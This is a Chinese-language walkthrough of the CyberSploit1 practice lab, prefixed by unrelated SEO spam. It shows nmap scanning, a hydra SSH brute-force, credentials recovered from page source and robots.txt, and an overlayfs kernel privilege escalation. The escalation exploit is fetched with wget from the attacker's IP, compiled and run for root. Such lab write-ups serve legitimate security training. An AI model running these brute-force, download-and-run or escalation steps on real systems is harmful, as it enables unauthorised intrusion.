网站空间换了 使用原有域名,软件项目管理的内容,东莞自助建站平台,阿里云 安装wordpressOSCP系列靶场-Esay-CyberSploit1
总结 getwebshell → 源码注释发现用户名 → robots.txt发现base64密码 → SSH登录
提 权 思 路 → 内网信息收集 → 发现发行版本有点老 → 内核overlayfs提权
准备工作 启动VPN 获取攻击机IP 192.168.45.220 启动靶机 获取目标机器I…OSCP系列靶场-Esay-CyberSploit1
总结 getwebshell → 源码注释发现用户名 → robots.txt发现base64密码 → SSH登录
提 权 思 路 → 内网信息收集 → 发现发行版本有点老 → 内核overlayfs提权
准备工作 启动VPN 获取攻击机IP 192.168.45.220 启动靶机 获取目标机器IP 192.168.176.92 信息收集-端口扫描 目标开放端口收集
Nmap开放端口扫描2次 ┌──(root㉿Kali)-[/home/bachang/CyberSploit1] └─# ┌──(root㉿Kali)-[/home/bachang/Blogger] └─# sudo nmap --min-rate 10000 -p- 192.168.176.92 Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-23 11:45 CST Nmap scan report for 192.168.176.92 Host is up (0.30s latency). Not shown: 65533 closed tcp ports (reset) PORT STATE SERVICE 22/tcp open ssh 80/tcp open http Nmap done: 1 IP address (1 host up) scanned in 9.39 seconds 通过两次收集到的端口:→22,80
目标端口对应服务探测 # tcp探测 sudo nmap -sT -sV -O -sC -p22,80 192.168.176.92 信息收集-端口测试
两个端口的话通常突破口在80端口
22-SSH端口的信息收集
22-SSH端口版本信息与MSF利用(待定)
通过Nmap探测获得SSH的版本信息可以尝试利用 # 进入msf # 探测版本为OpenSSH 5.9p1 Debian 5ubuntu1.10 msfconsole # 搜索对应脚本 msf6 searchsploit OpenSSH 5.9p1 貌似存在用户枚举等没思路的时候可以来试试
22-SSH手动登录尝试(失败)
尝试root账户的密码爆破 ssh root192.168.176.92 -p 22 # 密码尝试 password gt; root 22-SSH弱口令爆破(挂着干别的)
尝试root账户的密码爆破利用工具hydra线程-t为6 1.hydra -l root -P /usr/share/wordlists/metasploit/password.lst -t 6 -vV 192.168.176.92 ssh -s 22 80-HTTP端口的信息收集
访问 http://192.168.176.92/ 发现不是一个标准的CMS从源码查看开始
信息收集-源码查看 # 包括文章中是否写明一些敏感信息 curl http://192.168.176.92:80 收集到一个用户名信息 itsskv
信息收集-目录扫描
信息收集-目录扫描初步 dirsearch -u http://192.168.176.92:80 -x 302,403 因为扫出了目录深层次的扫描待选 信息收集-目录扫描(后缀) 信息收集-目录扫描(深度/大字典) 信息收集-目录扫描(深度/大字典后缀) 信息收集-目录访问
/robots.txt端点访问 存在一串代码推测是加密带等号尝试用bashe64解密 1.Y3liZXJzcGxvaXR7eW91dHViZS5jb20vYy9jeWJlcnNwbG9pdH0 base64解密
利用kali解密得到了内容确认是base64加密 ┌──(root㉿Kali)-[/home/bachang/Blogger] └─# echo Y3liZXJzcGxvaXR7eW91dHViZS5jb20vYy9jeWJlcnNwbG9pdH0 | base64 -d cybersploit{youtube.com/c/cybersploit} 另外两个端点没东西
漏洞利用-getwebshell
信息泄露getwebshell
已知用户名 itsskv 和 cybersploit{youtube.com/c/cybersploit} 头脑风暴一下密码会不会和cybersploit{youtube.com/c/cybersploit}有关 之前hyrda可以爆破说明22端口是允许账号密码登录的
22-SSH账号密码登录(成功)
获取账号密码之后利用SSH进行登录 ssh itsskvspan192.168.176.92/span -p22 password gt; cybersploit (失败) password gt; cybersploit{youtube.com/c/cybersploit}(成功) 密码真长我真的会谢
内网遨游-getshell FLAG1获取 # 有2个理论上排除掉第一个找home下 itsskvspancybersploit-CTF/span:~$ find / -name local.txt 2gt;/dev/null /usr/share/checkbox/jobs/local.txt /home/itsskv/local.txt itsskvspancybersploit-CTF/span:~$ cat /home/itsskv/local.txt ********************* 信息收集-内网基础信息收集
在获取shell之后我们要进行内网信息的收集都是为了提权做准备
检测操作系统的发行版本 # 确定发行版本 较老 itsskvspancybersploit-CTF/span:~$ lsb_release -a No LSB modules are available. Distributor ID: Ubuntu Description: Ubuntu 12.04.5 LTS Release: 12.04 Codename: precise 查看内核版本信息 # 确定内核版本 itsskvspancybersploit-CTF/span:~$ uname -a Linux cybersploit-CTF 3.13.0-32-generic #57~precise1-Ubuntu SMP Tue Jul 15 03:50:54 UTC 2014 i686 athlon i386 GNU/Linux 确认home目录下用户 itsskvspancybersploit-CTF/span:~$ ls -al /home total 16 # 有两个用户 drwxr-xr-x 22 cybersploit cybersploit 4096 Sep 4 2020 cybersploit drwxr-xr-x 20 itsskv itsskv 4096 Sep 4 2020 itsskv 确认home目录下是否有隐藏文件 # 例如.ssh找密码 ./*_history找历史记录等 itsskvspancybersploit-CTF/span:~$ ls -al /home/itsskv # 查看了一下没啥 drwxr-xr-x 20 itsskv itsskv 4096 Sep 4 2020 . drwxr-xr-x 4 root root 4096 Jun 25 2020 .. -rw------- 1 itsskv itsskv 0 Sep 4 2020 .bash_history -rw-r--r-- 1 itsskv itsskv 220 Jun 25 2020 .bash_logout -rw-r--r-- 1 itsskv itsskv 3486 Jun 25 2020 .bashrc drwx------ 14 itsskv itsskv 4096 Jun 25 2020 .cache drwx------ 9 itsskv itsskv 4096 Jun 25 2020 .config 权限提升
Linux提权-内核overlayfs提权尝试
因为发行版本较老若存在以下情况进行overlayfsLinux Kernel Version提权
系统版本Linux Kernel Version大于3.13.0小于3.19UbuntuLinux 15.04UbuntuLinux 14.10UbuntuLinux 14.10UbuntuLinux 12.04
漏洞利用-内核overlayfs提权 msfconsole msf gt; searchsploit overlayfs 结合 3.13.0-32的版本信息选择2与3 # 如果想查看msf对应的内容 cat /usr/share/exploitdb/exploits/linux/local/37292.c 将文件保存在当前目录下方便开启http服务 ┌──(root㉿Kali)-[/home/bachang/CyberSploit1] └─# cp /usr/share/exploitdb/exploits/linux/local/37292.c ./shell.c ┌──(root㉿Kali)-[/home/bachang/CyberSploit1] └─# ls hydra.restore shell.c 攻击机开启服务 1.sudo python3 -m http.server 80 目标机器 # 首先到具有权限的目录下 如/tmp itsskvspancybersploit-CTF/span:~$ cd /tmp # 下载 itsskvspancybersploit-CTF/span:/tmp$ wget http://192.168.45.220/shell.c # 给权限 itsskvspancybersploit-CTF/span:/tmp$ chmod x shell.c # 如果是c的需要进行编译 itsskvspancybersploit-CTF/span:/tmp$ gcc shell.c -o shell.c # 运行 itsskvspancybersploit-CTF/span:/tmp$ ./shell.c spawning threads mount #1 mount #2 child threads done /etc/ld.so.preload created creating shared library # whoami root 提权成功
FLAG2获取 # cat /root/proof.txt ********************* 完结撒花~~~
原文地址: https://bbs.zkaq.cn/t/30873.html
